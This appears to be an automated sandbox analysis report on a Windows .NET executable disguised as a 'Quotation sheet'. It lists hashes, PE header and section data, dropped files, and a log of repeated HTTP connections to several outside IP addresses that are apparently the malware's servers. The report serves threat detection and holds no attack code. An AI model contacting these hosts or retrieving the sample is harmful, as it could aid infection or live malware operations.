                                                                                                                      Size (bytes):1172
                                                                                                                      Entropy (8bit):5.342253675595303
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:3TWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKIl9r6dj:jWSU4y4RQmFoUeWmfmZ9tK8NDE
                                                                                                                      MD5:65F39D0C067BD94798C0B18D69D25CC5
                                                                                                                      SHA1:C57AD5B4549322FC52F9975BB30CF5913F66592A
                                                                                                                      SHA-256:37A0B1D9D3308943E05997F9E8783652A36CDE5617E7B2309E2E324944D5937B
                                                                                                                      SHA-512:0C851CE128FA12EAE9A737F6FBEE34FB2790F46A84E525B05C84251972F04A94F2AFE97F244DD7C4691E3A844CC04EE1119D39CF5C33B645ECE5BC8022BF4C5A
                                                                                                                      Malicious:false
                                                                                                                      Preview:@...e...........................................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                      Process:C:\Windows\SysWOW64\pcaui.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):196608
                                                                                                                      Entropy (8bit):1.1239949490932863
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                      MD5:271D5F995996735B01672CF227C81C17
                                                                                                                      SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                      SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                      SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Entropy (8bit):7.721271044960644
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                      File name:Quotation sheet.exe
                                                                                                                      File size:795'136 bytes
                                                                                                                      MD5:44ae4c9c2ab6623c0c1d04bb8b81871e
                                                                                                                      SHA1:efdd834862890028d1b52e2076ff5f78c84754c5
                                                                                                                      SHA256:122baa2b0520a7dd37025a89bccf9fcaf87f99519bfc0ec84a4a48cddb6f9b6d
                                                                                                                      SHA512:13c156d9ad7156b918207848a79e1419e96c53a65c0aab04f6aa572395c5a148805d9e90439e9b4095667361467560cd23e0f875950433003cbc7aba23f8700e
                                                                                                                      SSDEEP:12288:lnCb+eCSmxbeTHBVQAZQ+rX61yukWpGxFO9IbJoQ5GfHZPXjK/9I3j/VzrRZPCoT:luCUVn9X6HhuJoQ5QZPXu9Iz/VHRZKo
                                                                                                                      TLSH:A305F1403756C702E5864BB00861E3B427B92E9EF521C31B8BF9ADFF7835719A199387
                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$sEg..............0..............5... ...@....@.. ....................................@................................
                                                                                                                      Icon Hash:00928e8e8686b000
                                                                                                                      Entrypoint:0x4c352e
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:false
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                      Time Stamp:0x67457324 [Tue Nov 26 07:05:08 2024 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:4
                                                                                                                      OS Version Minor:0
                                                                                                                      File Version Major:4
                                                                                                                      File Version Minor:0
                                                                                                                      Subsystem Version Major:4
                                                                                                                      Subsystem Version Minor:0
                                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                      Instruction
                                                                                                                      jmp dword ptr [00402000h]
                                                                                                                      add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc34dc | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x62c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc6000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xc152c | 0x54 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xc1534 | 0xc1600 | c2ab957c72e4ed6971a2a61c722da36b | False | 0.8919291875404007 | data | 7.730235064385923 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc4000 | 0x62c | 0x800 | 3a7567c8fc7174012ba25a20107e836f | False | 0.33984375 | data | 3.4798322112610487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xc6000 | 0xc | 0x200 | 596fe3cc357f31f1b04f03217c96e393 | False | 0.044921875 | data | 0.09409792566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xc4090 | 0x39c | data | | | 0.42207792207792205
RT_MANIFEST | 0xc443c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 26, 2024 11:17:19.263714075 CET | 49805 | 80 | 192.168.2.6 | 103.21.221.87
Nov 26, 2024 11:17:19.383790970 CET | 80 | 49805 | 103.21.221.87 | 192.168.2.6
Nov 26, 2024 11:17:19.384694099 CET | 49805 | 80 | 192.168.2.6 | 103.21.221.87
Nov 26, 2024 11:17:19.394519091 CET | 49805 | 80 | 192.168.2.6 | 103.21.221.87
Nov 26, 2024 11:17:19.514519930 CET | 80 | 49805 | 103.21.221.87 | 192.168.2.6
Nov 26, 2024 11:17:21.031378984 CET | 80 | 49805 | 103.21.221.87 | 192.168.2.6
Nov 26, 2024 11:17:21.031503916 CET | 80 | 49805 | 103.21.221.87 | 192.168.2.6
Nov 26, 2024 11:17:21.031594992 CET | 49805 | 80 | 192.168.2.6 | 103.21.221.87
Nov 26, 2024 11:17:21.034773111 CET | 49805 | 80 | 192.168.2.6 | 103.21.221.87
Nov 26, 2024 11:17:21.154659033 CET | 80 | 49805 | 103.21.221.87 | 192.168.2.6
Nov 26, 2024 11:17:36.763113022 CET | 49845 | 80 | 192.168.2.6 | 38.47.232.124
Nov 26, 2024 11:17:36.886116982 CET | 80 | 49845 | 38.47.232.124 | 192.168.2.6
Nov 26, 2024 11:17:36.886193037 CET | 49845 | 80 | 192.168.2.6 | 38.47.232.124
                                                                                                                      Nov 26, 2024 11:17:36.905915022 CET4984580192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:37.027040005 CET804984538.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:38.414474964 CET4984580192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:38.476531029 CET804984538.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:38.476547003 CET804984538.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:38.476644039 CET4984580192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:38.476664066 CET4984580192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:38.535080910 CET804984538.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:38.535753965 CET4984580192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:39.434300900 CET4985280192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:39.554419041 CET804985238.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:39.554579973 CET4985280192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:39.575300932 CET4985280192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:39.695374966 CET804985238.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:41.086462021 CET4985280192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:41.243105888 CET804985238.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:41.243119001 CET804985238.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:41.243127108 CET804985238.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:41.243210077 CET4985280192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:41.243242979 CET4985280192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:41.243242979 CET4985280192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:42.105149984 CET4985880192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:42.225706100 CET804985838.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:42.225966930 CET4985880192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:42.246438980 CET4985880192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:42.368531942 CET804985838.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:42.368556976 CET804985838.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:43.758385897 CET4985880192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:43.760225058 CET804985838.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:43.760305882 CET4985880192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:43.760322094 CET804985838.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:43.760369062 CET4985880192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:43.879576921 CET804985838.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:43.879666090 CET4985880192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:44.784531116 CET4986580192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:44.904476881 CET804986538.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:44.904687881 CET4986580192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:44.913440943 CET4986580192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:45.035063028 CET804986538.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:46.448482037 CET804986538.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:46.448595047 CET804986538.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:46.448657990 CET4986580192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:46.451270103 CET4986580192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:46.571949005 CET804986538.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:52.250286102 CET4988180192.168.2.6199.59.243.227
                                                                                                                      Nov 26, 2024 11:17:52.370229006 CET8049881199.59.243.227192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:52.370313883 CET4988180192.168.2.6199.59.243.227
                                                                                                                      Nov 26, 2024 11:17:52.384960890 CET4988180192.168.2.6199.59.243.227
                                                                                                                      Nov 26, 2024 11:17:52.505899906 CET8049881199.59.243.227192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:53.559665918 CET8049881199.59.243.227192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:53.559916019 CET8049881199.59.243.227192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:53.559928894 CET8049881199.59.243.227192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:53.559966087 CET4988180192.168.2.6199.59.243.227
                                                                                                                      Nov 26, 2024 11:17:53.559999943 CET4988180192.168.2.6199.59.243.227
                                                                                                                      Nov 26, 2024 11:17:53.902254105 CET4988180192.168.2.6199.59.243.227
                                                                                                                      Nov 26, 2024 11:17:54.917499065 CET4989280192.168.2.6199.59.243.227
                                                                                                                      Nov 26, 2024 11:17:55.037596941 CET8049892199.59.243.227192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:55.038312912 CET4989280192.168.2.6199.59.243.227
                                                                                                                      Nov 26, 2024 11:17:55.052819967 CET4989280192.168.2.6199.59.243.227
                                                                                                                      Nov 26, 2024 11:17:55.172898054 CET8049892199.59.243.227192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:56.180934906 CET8049892199.59.243.227192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:56.181469917 CET8049892199.59.243.227192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:56.181480885 CET8049892199.59.243.227192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:56.181627035 CET4989280192.168.2.6199.59.243.227
                                                                                                                      Nov 26, 2024 11:17:56.568792105 CET4989280192.168.2.6199.59.243.227
                                                                                                                      Nov 26, 2024 11:17:57.573952913 CET4989980192.168.2.6199.59.243.227
                                                                                                                      Nov 26, 2024 11:17:57.694073915 CET8049899199.59.243.227192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:57.694279909 CET4989980192.168.2.6199.59.243.227
                                                                                                                      Nov 26, 2024 11:17:57.708513021 CET4989980192.168.2.6199.59.243.227
                                                                                                                      Nov 26, 2024 11:17:57.829020977 CET8049899199.59.243.227192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:57.829036951 CET8049899199.59.243.227192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:58.790606022 CET8049899199.59.243.227192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:58.790813923 CET8049899199.59.243.227192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:58.790826082 CET8049899199.59.243.227192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:58.790860891 CET4989980192.168.2.6199.59.243.227
                                                                                                                      Nov 26, 2024 11:17:58.790896893 CET4989980192.168.2.6199.59.243.227
                                                                                                                      Nov 26, 2024 11:17:59.212426901 CET4989980192.168.2.6199.59.243.227
                                                                                                                      Nov 26, 2024 11:18:00.229948044 CET4990580192.168.2.6199.59.243.227
                                                                                                                      Nov 26, 2024 11:18:00.349889994 CET8049905199.59.243.227192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:00.350032091 CET4990580192.168.2.6199.59.243.227
                                                                                                                      Nov 26, 2024 11:18:00.359397888 CET4990580192.168.2.6199.59.243.227
                                                                                                                      Nov 26, 2024 11:18:00.479548931 CET8049905199.59.243.227192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:01.496762037 CET8049905199.59.243.227192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:01.497198105 CET8049905199.59.243.227192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:01.497212887 CET8049905199.59.243.227192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:01.497323990 CET4990580192.168.2.6199.59.243.227
                                                                                                                      Nov 26, 2024 11:18:01.500041008 CET4990580192.168.2.6199.59.243.227
                                                                                                                      Nov 26, 2024 11:18:01.620059967 CET8049905199.59.243.227192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:07.728034019 CET4992280192.168.2.6146.88.233.115
                                                                                                                      Nov 26, 2024 11:18:07.848079920 CET8049922146.88.233.115192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:07.848201990 CET4992280192.168.2.6146.88.233.115
                                                                                                                      Nov 26, 2024 11:18:07.863389015 CET4992280192.168.2.6146.88.233.115
                                                                                                                      Nov 26, 2024 11:18:07.987380981 CET8049922146.88.233.115192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:09.367652893 CET4992280192.168.2.6146.88.233.115
                                                                                                                      Nov 26, 2024 11:18:09.489231110 CET8049922146.88.233.115192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:09.489305019 CET4992280192.168.2.6146.88.233.115
                                                                                                                      Nov 26, 2024 11:18:10.386919975 CET4992980192.168.2.6146.88.233.115
                                                                                                                      Nov 26, 2024 11:18:10.508213043 CET8049929146.88.233.115192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:10.508284092 CET4992980192.168.2.6146.88.233.115
                                                                                                                      Nov 26, 2024 11:18:10.523684025 CET4992980192.168.2.6146.88.233.115
                                                                                                                      Nov 26, 2024 11:18:10.643893003 CET8049929146.88.233.115192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:11.782625914 CET8049929146.88.233.115192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:11.782813072 CET8049929146.88.233.115192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:11.782859087 CET4992980192.168.2.6146.88.233.115
                                                                                                                      Nov 26, 2024 11:18:12.039511919 CET4992980192.168.2.6146.88.233.115
                                                                                                                      Nov 26, 2024 11:18:13.058206081 CET4993880192.168.2.6146.88.233.115
                                                                                                                      Nov 26, 2024 11:18:13.178246975 CET8049938146.88.233.115192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:13.178356886 CET4993880192.168.2.6146.88.233.115
                                                                                                                      Nov 26, 2024 11:18:13.192737103 CET4993880192.168.2.6146.88.233.115
                                                                                                                      Nov 26, 2024 11:18:13.312832117 CET8049938146.88.233.115192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:13.312850952 CET8049938146.88.233.115192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:14.641567945 CET8049938146.88.233.115192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:14.641597986 CET8049938146.88.233.115192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:14.641638041 CET4993880192.168.2.6146.88.233.115
                                                                                                                      Nov 26, 2024 11:18:14.695777893 CET4993880192.168.2.6146.88.233.115
                                                                                                                      Nov 26, 2024 11:18:15.717068911 CET4994480192.168.2.6146.88.233.115
                                                                                                                      Nov 26, 2024 11:18:15.837261915 CET8049944146.88.233.115192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:15.837374926 CET4994480192.168.2.6146.88.233.115
                                                                                                                      Nov 26, 2024 11:18:15.846681118 CET4994480192.168.2.6146.88.233.115
                                                                                                                      Nov 26, 2024 11:18:15.967363119 CET8049944146.88.233.115192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:17.113609076 CET8049944146.88.233.115192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:17.113782883 CET8049944146.88.233.115192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:17.114012957 CET4994480192.168.2.6146.88.233.115
                                                                                                                      Nov 26, 2024 11:18:17.116509914 CET4994480192.168.2.6146.88.233.115
                                                                                                                      Nov 26, 2024 11:18:17.236634970 CET8049944146.88.233.115192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:23.029532909 CET4996080192.168.2.6194.85.61.76
                                                                                                                      Nov 26, 2024 11:18:23.149751902 CET8049960194.85.61.76192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:23.149940968 CET4996080192.168.2.6194.85.61.76
                                                                                                                      Nov 26, 2024 11:18:23.164010048 CET4996080192.168.2.6194.85.61.76
                                                                                                                      Nov 26, 2024 11:18:23.285192013 CET8049960194.85.61.76192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:24.529572964 CET8049960194.85.61.76192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:24.529601097 CET8049960194.85.61.76192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:24.529666901 CET4996080192.168.2.6194.85.61.76
                                                                                                                      Nov 26, 2024 11:18:24.680155993 CET4996080192.168.2.6194.85.61.76
                                                                                                                      Nov 26, 2024 11:18:25.699374914 CET4996680192.168.2.6194.85.61.76
                                                                                                                      Nov 26, 2024 11:18:25.819381952 CET8049966194.85.61.76192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:25.819578886 CET4996680192.168.2.6194.85.61.76
                                                                                                                      Nov 26, 2024 11:18:25.834130049 CET4996680192.168.2.6194.85.61.76
                                                                                                                      Nov 26, 2024 11:18:25.954282999 CET8049966194.85.61.76192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:27.154783964 CET8049966194.85.61.76192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:27.154879093 CET8049966194.85.61.76192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:27.154952049 CET4996680192.168.2.6194.85.61.76
                                                                                                                      Nov 26, 2024 11:18:27.336388111 CET4996680192.168.2.6194.85.61.76
                                                                                                                      Nov 26, 2024 11:18:28.355542898 CET4997380192.168.2.6194.85.61.76
                                                                                                                      Nov 26, 2024 11:18:28.476133108 CET8049973194.85.61.76192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:28.476218939 CET4997380192.168.2.6194.85.61.76
                                                                                                                      Nov 26, 2024 11:18:28.505179882 CET4997380192.168.2.6194.85.61.76
                                                                                                                      Nov 26, 2024 11:18:28.625407934 CET8049973194.85.61.76192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:28.625432014 CET8049973194.85.61.76192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:29.856307983 CET8049973194.85.61.76192.168.2.6
                                                                                                                      Nov 26, 2024 11:18:29.856358051 CET8049973194.85.61.76192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:20.793541908 CET80500178.210.114.150192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:20.793601990 CET5001780192.168.2.68.210.114.150
                                                                                                                      Nov 26, 2024 11:19:20.796263933 CET5001780192.168.2.68.210.114.150
                                                                                                                      Nov 26, 2024 11:19:20.916311979 CET80500178.210.114.150192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:26.155589104 CET5001880192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:26.276861906 CET8050018172.67.209.48192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:26.276987076 CET5001880192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:26.303544044 CET5001880192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:26.426482916 CET8050018172.67.209.48192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:27.515847921 CET8050018172.67.209.48192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:27.516012907 CET8050018172.67.209.48192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:27.516069889 CET5001880192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:27.516143084 CET8050018172.67.209.48192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:27.516191959 CET5001880192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:27.805218935 CET5001880192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:28.865211964 CET5001980192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:28.985985041 CET8050019172.67.209.48192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:28.986061096 CET5001980192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:29.009712934 CET5001980192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:29.129755974 CET8050019172.67.209.48192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:30.261264086 CET8050019172.67.209.48192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:30.261507034 CET8050019172.67.209.48192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:30.261560917 CET5001980192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:30.261625051 CET8050019172.67.209.48192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:30.261676073 CET5001980192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:30.524071932 CET5001980192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:31.542443991 CET5002080192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:31.662477016 CET8050020172.67.209.48192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:31.662661076 CET5002080192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:31.674840927 CET5002080192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:31.794857025 CET8050020172.67.209.48192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:31.794913054 CET8050020172.67.209.48192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:32.899388075 CET8050020172.67.209.48192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:32.899518013 CET8050020172.67.209.48192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:32.899574041 CET5002080192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:32.900015116 CET8050020172.67.209.48192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:32.900063992 CET5002080192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:33.180373907 CET5002080192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:34.198838949 CET5002180192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:34.319623947 CET8050021172.67.209.48192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:34.319744110 CET5002180192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:34.332317114 CET5002180192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:34.454200983 CET8050021172.67.209.48192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:35.497819901 CET8050021172.67.209.48192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:35.498091936 CET8050021172.67.209.48192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:35.498195887 CET5002180192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:35.498281002 CET8050021172.67.209.48192.168.2.6
                                                                                                                      Nov 26, 2024 11:19:35.498330116 CET5002180192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:35.500731945 CET5002180192.168.2.6172.67.209.48
                                                                                                                      Nov 26, 2024 11:19:35.625433922 CET8050021172.67.209.48192.168.2.6
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49805 | 103.21.221.87 | 80 | 2444 | C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
Timestamp | Bytes transferred | Direction | Data
